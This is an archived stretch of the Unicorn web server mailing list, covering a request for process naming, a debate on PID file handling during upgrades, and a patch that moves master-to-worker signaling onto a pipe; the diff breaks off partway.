Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Suggestion for Named Process
@ 2014-01-15 11:37  3% Bob McKinven
  2014-01-15 18:19  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Bob McKinven @ 2014-01-15 11:37 UTC (permalink / raw)
  To: mongrel-unicorn

Hi,

When running multiple rails apps on the same server it can become a pain identifying which 'unicorn_rails master’ process is running which app (can’t always tell from the user).

My suggestion is for a --name option to allow each process to be named individually.

E.g.  "unicorn_rails --name tiddles_unicorn -D" would show  “tiddles_unicorn master” & “tiddles_unicorn worker[1]” when using PS

I can be cc’d at bob@gigglemania.co.uk.

Cheers.

Bob
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Issues with PID file renaming
  2013-12-12 19:15  3%           ` Petteri Räty
@ 2013-12-12 20:51  0%             ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-12-12 20:51 UTC (permalink / raw)
  To: unicorn list

Petteri Räty <betelgeuse@gentoo.org> wrote:
> On 11.12.2013 15.54, Michael Fischer wrote:
> > On Tue, Dec 10, 2013 at 10:44 PM, Petteri Räty <betelgeuse@gentoo.org> wrote:
> > 
> >> At least for pid based monitoring tools it is (I do agree with others
> >> that you should also be monitoring http though). For example monit
> >> requires that you give it a pid file. Why is it wrong for them to point
> >> to the same pid?
> > 
> > Monit doesn't require a pid, never has:
> > 
> > http://mmonit.com/monit/documentation/monit.html#connection_testing
> > 
> 
> Only if you want to do connection testing. What if you want to monitor
> the memory usage of unicorn processes?

Your monitoring has to adapt to the new processes anyways.  Can it
really not deal with a PID file being temporarily absent?

There's a plethora of tools in the wild which deal with PID files.
Consider this case:

It's likely a tool will see foo.pid.oldbin existing, and wait for
foo.pid to become available.  If foo.pid is already available from a
hardlink, it'll be pointing to the old PID, and any tool which backs out
of the upgrade by intending to kill the new PID will end up hitting the
old one.
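
Concretely, the failure mode is something like this (a sketch; the PIDs
are made up):

    # during the USR2 upgrade window, both names share one inode and one PID:
    File.read("foo.pid")         # => "100\n"  (old master, via the hard link)
    File.read("foo.pid.oldbin")  # => "100\n"

    # a tool that wants to back out of the upgrade by killing the *new*
    # master reads foo.pid and ends up signaling the old master instead:
    Process.kill(:QUIT, File.read("foo.pid").to_i)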
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Issues with PID file renaming
  2013-12-11 13:54  0%         ` Michael Fischer
@ 2013-12-12 19:15  3%           ` Petteri Räty
  2013-12-12 20:51  0%             ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Petteri Räty @ 2013-12-12 19:15 UTC (permalink / raw)
  To: mongrel-unicorn

On 11.12.2013 15.54, Michael Fischer wrote:
> On Tue, Dec 10, 2013 at 10:44 PM, Petteri Räty <betelgeuse@gentoo.org> wrote:
> 
>> At least for pid based monitoring tools it is (I do agree with others
>> that you should also be monitoring http though). For example monit
>> requires that you give it a pid file. Why is it wrong for them to point
>> to the same pid?
> 
> Monit doesn't require a pid, never has:
> 
> http://mmonit.com/monit/documentation/monit.html#connection_testing
> 

Only if you want to do connection testing. What if you want to monitor
the memory usage of unicorn processes?

> To answer your question, though, the reason the pid files must contain
> different PIDs is that the two processes (previous and
> current-generation masters) have different PIDs.  And some of us do
> care that they differ :)
> 

Eric's original comment and my response was about the pid files having
the same content (albeit shortly).

Regards,
Petteri

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Issues with PID file renaming
  2013-12-10 22:44  3%       ` Petteri Räty
@ 2013-12-11 13:54  0%         ` Michael Fischer
  2013-12-12 19:15  3%           ` Petteri Räty
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2013-12-11 13:54 UTC (permalink / raw)
  To: unicorn list

On Tue, Dec 10, 2013 at 10:44 PM, Petteri Räty <betelgeuse@gentoo.org> wrote:

> At least for pid based monitoring tools it is (I do agree with others
> that you should also be monitoring http though). For example monit
> requires that you give it a pid file. Why is it wrong for them to point
> to the same pid?

Monit doesn't require a pid, never has:

http://mmonit.com/monit/documentation/monit.html#connection_testing

To answer your question, though, the reason the pid files must contain
different PIDs is that the two processes (previous and
current-generation masters) have different PIDs.  And some of us do
care that they differ :)

--Michael
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Issues with PID file renaming
  2013-12-10 19:52  3%     ` Eric Wong
@ 2013-12-10 22:44  3%       ` Petteri Räty
  2013-12-11 13:54  0%         ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Petteri Räty @ 2013-12-10 22:44 UTC (permalink / raw)
  To: mongrel-unicorn

On 10.12.2013 21.52, Eric Wong wrote:
> Petteri Räty <betelgeuse@gentoo.org> wrote:
>> On 26.11.2013 3.20, Eric Wong wrote:
>>> How about having the old process create a hard link to .oldbin,
>>> and having the new one override the pid if Process.ppid == pid file?
>>> The check is still racy, but that's what pid files are :<
>>
>> Isn't it possible to always keep a valid pid file by using the fact that
>> mv is atomic? Basically the new process writes the pid first to a temp
>> file and then moves it over the old pid file after having hard linked
>> the file to .oldbin?
>>
>> $ echo "1" > foo.pid
>> $ ln foo.pid foo.oldpid
>> $ echo "2" > tmp
>> $ mv tmp foo.pid
>> $ cat *pid
>> 1
>> 2
> 
> It's possible, but is it worth it?  Having both pid files point to the
> same pid is still wrong.
> 

At least for pid-based monitoring tools it is (I do agree with others
that you should also be monitoring http, though). For example, monit
requires that you give it a pid file. Why is it wrong for them to point
to the same pid? Seems OK to me, especially since they share the inode.
Anyway, I think this is better than there being no pid file at all.
After all, we are doing a zero-downtime deploy, which means there's
always a valid process.

Regards,
Petteri
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Issues with PID file renaming
  @ 2013-12-10 19:52  3%     ` Eric Wong
  2013-12-10 22:44  3%       ` Petteri Räty
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-12-10 19:52 UTC (permalink / raw)
  To: unicorn list

Petteri Räty <betelgeuse@gentoo.org> wrote:
> On 26.11.2013 3.20, Eric Wong wrote:
> > How about having the old process create a hard link to .oldbin,
> > and having the new one override the pid if Process.ppid == pid file?
> > The check is still racy, but that's what pid files are :<
> 
> Isn't it possible to always keep a valid pid file by using the fact that
> mv is atomic? Basically the new process writes the pid first to a temp
> file and then moves it over the old pid file after having hard linked
> the file to .oldbin?
> 
> $ echo "1" > foo.pid
> $ ln foo.pid foo.oldpid
> $ echo "2" > tmp
> $ mv tmp foo.pid
> $ cat *pid
> 1
> 2

It's possible, but is it worth it?  Having both pid files point to the
same pid is still wrong.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] rework master-to-worker signaling to use a pipe
  2013-12-09  9:52  2% [PATCH] rework master-to-worker signaling to use a pipe Eric Wong
@ 2013-12-10  0:22  0% ` Sam Saffron
  0 siblings, 0 replies; 200+ results
From: Sam Saffron @ 2013-12-10  0:22 UTC (permalink / raw)
  To: unicorn list

Eric,

Your work on unicorn is exemplary and your responsiveness second to
none. I did want to come full circle on the issue, though.

After discussing with tmm1 and ko1, the conclusion is that pg is using
ubfs incorrectly. They are just there to unblock IO, not to act as
termination hooks; once IO is unblocked you still need to be able to
re-acquire it. pg was using ubfs as termination hooks. See the full
discussion at: https://groups.google.com/forum/#!topic/ruby-pg/5_ylGmog1S4

The end result is that I suggested Lars open a Redmine ticket if we
need ubfs to act as termination hooks; the change to pg was reverted.

Bottom line is that your change is not really required.

Thank you so much for being super responsive here. Sorry if I caused
you to go on a tangent you didn't need to go on.

Sam

On Mon, Dec 9, 2013 at 8:52 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Signaling using normal kill(2) is preserved, but the master now
> prefers to signal workers using a pipe rather than kill(2).
> Non-graceful signals (:TERM/:KILL) are still sent using kill(2),
> as they ask for immediate shutdown.
>
> This change is necessary to avoid triggering the ubf (unblocking
> function) for rb_thread_call_without_gvl (and similar) functions in
> extensions.  Most notably, this fixes compatibility with newer
> versions of the 'pg' gem which will cancel a running DB query if
> signaled[1].
>
> This also has the nice side-effect of allowing a premature
> master death (assuming preload_app didn't cause the master to
> spawn off rogue child daemons).
>
> Note: users should also refrain from using "killall" if using the
> 'pg' gem or something like it.
>
> Unfortunately, this increases FD usage in the master as the writable
> end of the pipe is preserved in the master.  This limit the number
> of worker processes the master may run to the open file limit of the
> master process.  Increasing the open file limit of the master
> process may be needed.  However, the FD use on the workers is
> reduced by one as the internal self-pipe is no longer used.  Thus,
> overall pipe allocation for the kernel remains unchanged.
>
> [1] - pg is correct to cancel a query, as it cannot know if
>       the signal was for a) graceful unicorn shutdown or
>       b) oh-noes-I-started-a-bad-query-ABORT-ABORT-ABORT!!
> ---
>   Pushed to master on git://bogomips.org/unicorn.git
>   commit 6f6e4115b4bb03e5e7c55def91527799190566f2
>
>  SIGNALS                    |  6 ++++
>  lib/unicorn.rb             |  5 +++
>  lib/unicorn/http_server.rb | 85 +++++++++++++++++++++++-----------------------
>  lib/unicorn/worker.rb      | 64 ++++++++++++++++++++++++++++++++++
>  4 files changed, 118 insertions(+), 42 deletions(-)
>
> diff --git a/SIGNALS b/SIGNALS
> index 48c651e..ef0b0d9 100644
> --- a/SIGNALS
> +++ b/SIGNALS
> @@ -45,6 +45,10 @@ http://unicorn.bogomips.org/examples/init.sh
>
>  === Worker Processes
>
> +Note: as of unicorn 4.8, the master uses a pipe to signal workers
> +instead of kill(2) for most cases.  Using signals still (and works and
> +remains supported for external tools/libraries), however.
> +
>  Sending signals directly to the worker processes should not normally be
>  needed.  If the master process is running, any exited worker will be
>  automatically respawned.
> @@ -52,6 +56,8 @@ automatically respawned.
>  * INT/TERM - Quick shutdown, immediately exit.
>    Unless WINCH has been sent to the master (or the master is killed),
>    the master process will respawn a worker to replace this one.
> +  Immediate shutdown is still triggered using kill(2) and not the
> +  internal pipe as of unicorn 4.8
>
>  * QUIT - Gracefully exit after finishing the current request.
>    Unless WINCH has been sent to the master (or the master is killed),
> diff --git a/lib/unicorn.rb b/lib/unicorn.rb
> index 2535159..638b846 100644
> --- a/lib/unicorn.rb
> +++ b/lib/unicorn.rb
> @@ -97,6 +97,11 @@ module Unicorn
>      logger.error "#{prefix}: #{message} (#{exc.class})"
>      exc.backtrace.each { |line| logger.error(line) }
>    end
> +
> +  # remove this when we only support Ruby >= 2.0
> +  def self.pipe # :nodoc:
> +    Kgio::Pipe.new.each { |io| io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
> +  end
>    # :startdoc:
>  end
>  # :enddoc:
> diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
> index f15c8a7..ae8ad13 100644
> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -42,16 +42,8 @@ class Unicorn::HttpServer
>    # it to wake up the master from IO.select in exactly the same manner
>    # djb describes in http://cr.yp.to/docs/selfpipe.html
>    #
> -  # * The workers immediately close the pipe they inherit from the
> -  # master and replace it with a new pipe after forking.  This new
> -  # pipe is also used to wakeup from IO.select from inside (worker)
> -  # signal handlers.  However, workers *close* the pipe descriptors in
> -  # the signal handlers to raise EBADF in IO.select instead of writing
> -  # like we do in the master.  We cannot easily use the reader set for
> -  # IO.select because LISTENERS is already that set, and it's extra
> -  # work (and cycles) to distinguish the pipe FD from the reader set
> -  # once IO.select returns.  So we're lazy and just close the pipe when
> -  # a (rare) signal arrives in the worker and reinitialize the pipe later.
> +  # * The workers immediately close the pipe they inherit.  See the
> +  # Unicorn::Worker class for the pipe workers use.
>    SELF_PIPE = []
>
>    # signal queue used for self-piping
> @@ -127,7 +119,7 @@ class Unicorn::HttpServer
>      inherit_listeners!
>      # this pipe is used to wake us up from select(2) in #join when signals
>      # are trapped.  See trap_deferred.
> -    init_self_pipe!
> +    SELF_PIPE.replace(Unicorn.pipe)
>
>      # setup signal handlers before writing pid file in case people get
>      # trigger happy and send signals as soon as the pid file exists.
> @@ -306,14 +298,14 @@ class Unicorn::HttpServer
>          logger.info "master reopening logs..."
>          Unicorn::Util.reopen_logs
>          logger.info "master done reopening logs"
> -        kill_each_worker(:USR1)
> +        soft_kill_each_worker(:USR1)
>        when :USR2 # exec binary, stay alive in case something went wrong
>          reexec
>        when :WINCH
>          if Unicorn::Configurator::RACKUP[:daemonized]
>            respawn = false
>            logger.info "gracefully stopping all workers"
> -          kill_each_worker(:QUIT)
> +          soft_kill_each_worker(:QUIT)
>            self.worker_processes = 0
>          else
>            logger.info "SIGWINCH ignored because we're not daemonized"
> @@ -345,7 +337,11 @@ class Unicorn::HttpServer
>      self.listeners = []
>      limit = Time.now + timeout
>      until WORKERS.empty? || Time.now > limit
> -      kill_each_worker(graceful ? :QUIT : :TERM)
> +      if graceful
> +        soft_kill_each_worker(:QUIT)
> +      else
> +        kill_each_worker(:TERM)
> +      end
>        sleep(0.1)
>        reap_all_workers
>      end
> @@ -498,6 +494,7 @@ class Unicorn::HttpServer
>    end
>
>    def after_fork_internal
> +    SELF_PIPE.each { |io| io.close }.clear # this is master-only, now
>      @ready_pipe.close if @ready_pipe
>      Unicorn::Configurator::RACKUP.clear
>      @ready_pipe = @init_listeners = @before_exec = @before_fork = nil
> @@ -517,6 +514,7 @@ class Unicorn::HttpServer
>        before_fork.call(self, worker)
>        if pid = fork
>          WORKERS[pid] = worker
> +        worker.atfork_parent
>        else
>          after_fork_internal
>          worker_loop(worker)
> @@ -531,9 +529,7 @@ class Unicorn::HttpServer
>    def maintain_worker_count
>      (off = WORKERS.size - worker_processes) == 0 and return
>      off < 0 and return spawn_missing_workers
> -    WORKERS.dup.each_pair { |wpid,w|
> -      w.nr >= worker_processes and kill_worker(:QUIT, wpid) rescue nil
> -    }
> +    WORKERS.each_value { |w| w.nr >= worker_processes and w.soft_kill(:QUIT) }
>    end
>
>    # if we get any error, try to write something back to the client
> @@ -600,6 +596,7 @@ class Unicorn::HttpServer
>    # traps for USR1, USR2, and HUP may be set in the after_fork Proc
>    # by the user.
>    def init_worker_process(worker)
> +    worker.atfork_child
>      # we'll re-trap :QUIT later for graceful shutdown iff we accept clients
>      EXIT_SIGS.each { |sig| trap(sig) { exit!(0) } }
>      exit!(0) if (SIG_QUEUE & EXIT_SIGS)[0]
> @@ -608,23 +605,27 @@ class Unicorn::HttpServer
>      SIG_QUEUE.clear
>      proc_name "worker[#{worker.nr}]"
>      START_CTX.clear
> -    init_self_pipe!
>      WORKERS.clear
> +
> +    after_fork.call(self, worker) # can drop perms and create listeners
>      LISTENERS.each { |sock| sock.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
> -    after_fork.call(self, worker) # can drop perms
> +
>      worker.user(*user) if user.kind_of?(Array) && ! worker.switched
>      self.timeout /= 2.0 # halve it for select()
>      @config = nil
>      build_app! unless preload_app
>      ssl_enable!
>      @after_fork = @listener_opts = @orig_app = nil
> +    readers = LISTENERS.dup
> +    readers << worker
> +    trap(:QUIT) { readers.each { |io| io.close }.replace([false]) }
> +    readers
>    end
>
>    def reopen_worker_logs(worker_nr)
>      logger.info "worker=#{worker_nr} reopening logs..."
>      Unicorn::Util.reopen_logs
>      logger.info "worker=#{worker_nr} done reopening logs"
> -    init_self_pipe!
>      rescue => e
>        logger.error(e) rescue nil
>        exit!(77) # EX_NOPERM in sysexits.h
> @@ -635,22 +636,24 @@ class Unicorn::HttpServer
>    # given a INT, QUIT, or TERM signal)
>    def worker_loop(worker)
>      ppid = master_pid
> -    init_worker_process(worker)
> +    readers = init_worker_process(worker)
>      nr = 0 # this becomes negative if we need to reopen logs
> -    l = LISTENERS.dup
> -    ready = l.dup
>
> -    # closing anything we IO.select on will raise EBADF
> -    trap(:USR1) { nr = -65536; SELF_PIPE[0].close rescue nil }
> -    trap(:QUIT) { worker = nil; LISTENERS.each { |s| s.close rescue nil }.clear }
> -    logger.info "worker=#{worker.nr} ready"
> +    # this only works immediately if the master sent us the signal
> +    # (which is the normal case)
> +    trap(:USR1) { nr = -65536 }
> +
> +    ready = readers.dup
> +    @logger.info "worker=#{worker.nr} ready"
>
>      begin
>        nr < 0 and reopen_worker_logs(worker.nr)
>        nr = 0
> -
>        worker.tick = Time.now.to_i
> -      while sock = ready.shift
> +      tmp = ready.dup
> +      while sock = tmp.shift
> +        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
> +        # but that will return false
>          if client = sock.kgio_tryaccept
>            process_client(client)
>            nr += 1
> @@ -663,8 +666,8 @@ class Unicorn::HttpServer
>        # we're probably reasonably busy, so avoid calling select()
>        # and do a speculative non-blocking accept() on ready listeners
>        # before we sleep again in select().
> -      unless nr == 0 # (nr < 0) => reopen logs (unlikely)
> -        ready = l.dup
> +      unless nr == 0
> +        tmp = ready.dup
>          redo
>        end
>
> @@ -672,11 +675,11 @@ class Unicorn::HttpServer
>
>        # timeout used so we can detect parent death:
>        worker.tick = Time.now.to_i
> -      ret = IO.select(l, nil, SELF_PIPE, @timeout) and ready = ret[0]
> +      ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
>      rescue => e
> -      redo if nr < 0 && (Errno::EBADF === e || IOError === e) # reopen logs
> -      Unicorn.log_error(@logger, "listen loop error", e) if worker
> -    end while worker
> +      redo if nr < 0
> +      Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
> +    end while readers[0]
>    end
>
>    # delivers a signal to a worker and fails gracefully if the worker
> @@ -692,6 +695,10 @@ class Unicorn::HttpServer
>      WORKERS.keys.each { |wpid| kill_worker(signal, wpid) }
>    end
>
> +  def soft_kill_each_worker(signal)
> +    WORKERS.each_value { |worker| worker.soft_kill(signal) }
> +  end
> +
>    # unlinks a PID file at given +path+ if it contains the current PID
>    # still potentially racy without locking the directory (which is
>    # non-portable and may interact badly with other programs), but the
> @@ -720,7 +727,7 @@ class Unicorn::HttpServer
>      config[:listeners].replace(@init_listeners)
>      config.reload
>      config.commit!(self)
> -    kill_each_worker(:QUIT)
> +    soft_kill_each_worker(:QUIT)
>      Unicorn::Util.reopen_logs
>      self.app = orig_app
>      build_app! if preload_app
> @@ -756,12 +763,6 @@ class Unicorn::HttpServer
>      io.sync = true
>    end
>
> -  def init_self_pipe!
> -    SELF_PIPE.each { |io| io.close rescue nil }
> -    SELF_PIPE.replace(Kgio::Pipe.new)
> -    SELF_PIPE.each { |io| io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
> -  end
> -
>    def inherit_listeners!
>      # inherit sockets from parents, they need to be plain Socket objects
>      # before they become Kgio::UNIXServer or Kgio::TCPServer
> diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
> index 1fb6a4a..e74a1c9 100644
> --- a/lib/unicorn/worker.rb
> +++ b/lib/unicorn/worker.rb
> @@ -12,6 +12,7 @@ class Unicorn::Worker
>    # :stopdoc:
>    attr_accessor :nr, :switched
>    attr_writer :tmp
> +  attr_reader :to_io # IO.select-compatible
>
>    PER_DROP = Raindrops::PAGE_SIZE / Raindrops::SIZE
>    DROPS = []
> @@ -23,6 +24,66 @@ class Unicorn::Worker
>      @raindrop[@offset] = 0
>      @nr = nr
>      @tmp = @switched = false
> +    @to_io, @master = Unicorn.pipe
> +  end
> +
> +  def atfork_child # :nodoc:
> +    # we _must_ close in child, parent just holds this open to signal
> +    @master = @master.close
> +  end
> +
> +  # master fakes SIGQUIT using this
> +  def quit # :nodoc:
> +    @master = @master.close if @master
> +  end
> +
> +  # parent does not read
> +  def atfork_parent # :nodoc:
> +    @to_io = @to_io.close
> +  end
> +
> +  # call a signal handler immediately without triggering EINTR
> +  # We do not use the more obvious Process.kill(sig, $$) here since
> +  # that signal delivery may be deferred.  We want to avoid signal delivery
> +  # while the Rack app.call is running because some database drivers
> +  # (e.g. ruby-pg) may cancel pending requests.
> +  def fake_sig(sig) # :nodoc:
> +    old_cb = trap(sig, "IGNORE")
> +    old_cb.call
> +  ensure
> +    trap(sig, old_cb)
> +  end
> +
> +  # master sends fake signals to children
> +  def soft_kill(sig) # :nodoc:
> +    case sig
> +    when Integer
> +      signum = sig
> +    else
> +      signum = Signal.list[sig.to_s] or
> +          raise ArgumentError, "BUG: bad signal: #{sig.inspect}"
> +    end
> +    # writing and reading 4 bytes on a pipe is atomic on all POSIX platforms
> +    # Do not care in the odd case the buffer is full, here.
> +    @master.kgio_trywrite([signum].pack('l'))
> +  rescue Errno::EPIPE
> +    # worker will be reaped soon
> +  end
> +
> +  # this only runs when the Rack app.call is not running
> +  # act like a listener
> +  def kgio_tryaccept # :nodoc:
> +    case buf = @to_io.kgio_tryread(4)
> +    when String
> +      # unpack the buffer and trigger the signal handler
> +      signum = buf.unpack('l')
> +      fake_sig(signum[0])
> +      # keep looping, more signals may be queued
> +    when nil # EOF: master died, but we are at a safe place to exit
> +      fake_sig(:QUIT)
> +    when :wait_readable # keep waiting
> +      return false
> +    end while true # loop, as multiple signals may be sent
>    end
>
>    # worker objects may be compared to just plain Integers
> @@ -49,8 +110,11 @@ class Unicorn::Worker
>      end
>    end
>
> +  # called in both the master (reaping worker) and worker (SIGQUIT handler)
>    def close # :nodoc:
>      @tmp.close if @tmp
> +    @master.close if @master
> +    @to_io.close if @to_io
>    end
>
>    # :startdoc:
> --
> Eric Wong
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* [PATCH] rework master-to-worker signaling to use a pipe
@ 2013-12-09  9:52  2% Eric Wong
  2013-12-10  0:22  0% ` Sam Saffron
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-12-09  9:52 UTC (permalink / raw)
  To: mongrel-unicorn

Signaling using normal kill(2) is preserved, but the master now
prefers to signal workers using a pipe rather than kill(2).
Non-graceful signals (:TERM/:KILL) are still sent using kill(2),
as they ask for immediate shutdown.

This change is necessary to avoid triggering the ubf (unblocking
function) for rb_thread_call_without_gvl (and similar) functions in
extensions.  Most notably, this fixes compatibility with newer
versions of the 'pg' gem which will cancel a running DB query if
signaled[1].

This also has the nice side-effect of allowing a premature
master death (assuming preload_app didn't cause the master to
spawn off rogue child daemons).

Note: users should also refrain from using "killall" if using the
'pg' gem or something like it.

Unfortunately, this increases FD usage in the master as the writable
end of the pipe is preserved in the master.  This limit the number
of worker processes the master may run to the open file limit of the
master process.  Increasing the open file limit of the master
process may be needed.  However, the FD use on the workers is
reduced by one as the internal self-pipe is no longer used.  Thus,
overall pipe allocation for the kernel remains unchanged.

[1] - pg is correct to cancel a query, as it cannot know if
      the signal was for a) graceful unicorn shutdown or
      b) oh-noes-I-started-a-bad-query-ABORT-ABORT-ABORT!!
---
  Pushed to master on git://bogomips.org/unicorn.git
  commit 6f6e4115b4bb03e5e7c55def91527799190566f2

 SIGNALS                    |  6 ++++
 lib/unicorn.rb             |  5 +++
 lib/unicorn/http_server.rb | 85 +++++++++++++++++++++++-----------------------
 lib/unicorn/worker.rb      | 64 ++++++++++++++++++++++++++++++++++
 4 files changed, 118 insertions(+), 42 deletions(-)

diff --git a/SIGNALS b/SIGNALS
index 48c651e..ef0b0d9 100644
--- a/SIGNALS
+++ b/SIGNALS
@@ -45,6 +45,10 @@ http://unicorn.bogomips.org/examples/init.sh
 
 === Worker Processes
 
+Note: as of unicorn 4.8, the master uses a pipe to signal workers
+instead of kill(2) for most cases.  Using signals still (and works and
+remains supported for external tools/libraries), however.
+
 Sending signals directly to the worker processes should not normally be
 needed.  If the master process is running, any exited worker will be
 automatically respawned.
@@ -52,6 +56,8 @@ automatically respawned.
 * INT/TERM - Quick shutdown, immediately exit.
   Unless WINCH has been sent to the master (or the master is killed),
   the master process will respawn a worker to replace this one.
+  Immediate shutdown is still triggered using kill(2) and not the
+  internal pipe as of unicorn 4.8
 
 * QUIT - Gracefully exit after finishing the current request.
   Unless WINCH has been sent to the master (or the master is killed),
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 2535159..638b846 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -97,6 +97,11 @@ module Unicorn
     logger.error "#{prefix}: #{message} (#{exc.class})"
     exc.backtrace.each { |line| logger.error(line) }
   end
+
+  # remove this when we only support Ruby >= 2.0
+  def self.pipe # :nodoc:
+    Kgio::Pipe.new.each { |io| io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
+  end
   # :startdoc:
 end
 # :enddoc:
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f15c8a7..ae8ad13 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -42,16 +42,8 @@ class Unicorn::HttpServer
   # it to wake up the master from IO.select in exactly the same manner
   # djb describes in http://cr.yp.to/docs/selfpipe.html
   #
-  # * The workers immediately close the pipe they inherit from the
-  # master and replace it with a new pipe after forking.  This new
-  # pipe is also used to wakeup from IO.select from inside (worker)
-  # signal handlers.  However, workers *close* the pipe descriptors in
-  # the signal handlers to raise EBADF in IO.select instead of writing
-  # like we do in the master.  We cannot easily use the reader set for
-  # IO.select because LISTENERS is already that set, and it's extra
-  # work (and cycles) to distinguish the pipe FD from the reader set
-  # once IO.select returns.  So we're lazy and just close the pipe when
-  # a (rare) signal arrives in the worker and reinitialize the pipe later.
+  # * The workers immediately close the pipe they inherit.  See the
+  # Unicorn::Worker class for the pipe workers use.
   SELF_PIPE = []
 
   # signal queue used for self-piping
@@ -127,7 +119,7 @@ class Unicorn::HttpServer
     inherit_listeners!
     # this pipe is used to wake us up from select(2) in #join when signals
     # are trapped.  See trap_deferred.
-    init_self_pipe!
+    SELF_PIPE.replace(Unicorn.pipe)
 
     # setup signal handlers before writing pid file in case people get
     # trigger happy and send signals as soon as the pid file exists.
@@ -306,14 +298,14 @@ class Unicorn::HttpServer
         logger.info "master reopening logs..."
         Unicorn::Util.reopen_logs
         logger.info "master done reopening logs"
-        kill_each_worker(:USR1)
+        soft_kill_each_worker(:USR1)
       when :USR2 # exec binary, stay alive in case something went wrong
         reexec
       when :WINCH
         if Unicorn::Configurator::RACKUP[:daemonized]
           respawn = false
           logger.info "gracefully stopping all workers"
-          kill_each_worker(:QUIT)
+          soft_kill_each_worker(:QUIT)
           self.worker_processes = 0
         else
           logger.info "SIGWINCH ignored because we're not daemonized"
@@ -345,7 +337,11 @@ class Unicorn::HttpServer
     self.listeners = []
     limit = Time.now + timeout
     until WORKERS.empty? || Time.now > limit
-      kill_each_worker(graceful ? :QUIT : :TERM)
+      if graceful
+        soft_kill_each_worker(:QUIT)
+      else
+        kill_each_worker(:TERM)
+      end
       sleep(0.1)
       reap_all_workers
     end
@@ -498,6 +494,7 @@ class Unicorn::HttpServer
   end
 
   def after_fork_internal
+    SELF_PIPE.each { |io| io.close }.clear # this is master-only, now
     @ready_pipe.close if @ready_pipe
     Unicorn::Configurator::RACKUP.clear
     @ready_pipe = @init_listeners = @before_exec = @before_fork = nil
@@ -517,6 +514,7 @@ class Unicorn::HttpServer
       before_fork.call(self, worker)
       if pid = fork
         WORKERS[pid] = worker
+        worker.atfork_parent
       else
         after_fork_internal
         worker_loop(worker)
@@ -531,9 +529,7 @@ class Unicorn::HttpServer
   def maintain_worker_count
     (off = WORKERS.size - worker_processes) == 0 and return
     off < 0 and return spawn_missing_workers
-    WORKERS.dup.each_pair { |wpid,w|
-      w.nr >= worker_processes and kill_worker(:QUIT, wpid) rescue nil
-    }
+    WORKERS.each_value { |w| w.nr >= worker_processes and w.soft_kill(:QUIT) }
   end
 
   # if we get any error, try to write something back to the client
@@ -600,6 +596,7 @@ class Unicorn::HttpServer
   # traps for USR1, USR2, and HUP may be set in the after_fork Proc
   # by the user.
   def init_worker_process(worker)
+    worker.atfork_child
     # we'll re-trap :QUIT later for graceful shutdown iff we accept clients
     EXIT_SIGS.each { |sig| trap(sig) { exit!(0) } }
     exit!(0) if (SIG_QUEUE & EXIT_SIGS)[0]
@@ -608,23 +605,27 @@ class Unicorn::HttpServer
     SIG_QUEUE.clear
     proc_name "worker[#{worker.nr}]"
     START_CTX.clear
-    init_self_pipe!
     WORKERS.clear
+
+    after_fork.call(self, worker) # can drop perms and create listeners
     LISTENERS.each { |sock| sock.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
-    after_fork.call(self, worker) # can drop perms
+
     worker.user(*user) if user.kind_of?(Array) && ! worker.switched
     self.timeout /= 2.0 # halve it for select()
     @config = nil
     build_app! unless preload_app
     ssl_enable!
     @after_fork = @listener_opts = @orig_app = nil
+    readers = LISTENERS.dup
+    readers << worker
+    trap(:QUIT) { readers.each { |io| io.close }.replace([false]) }
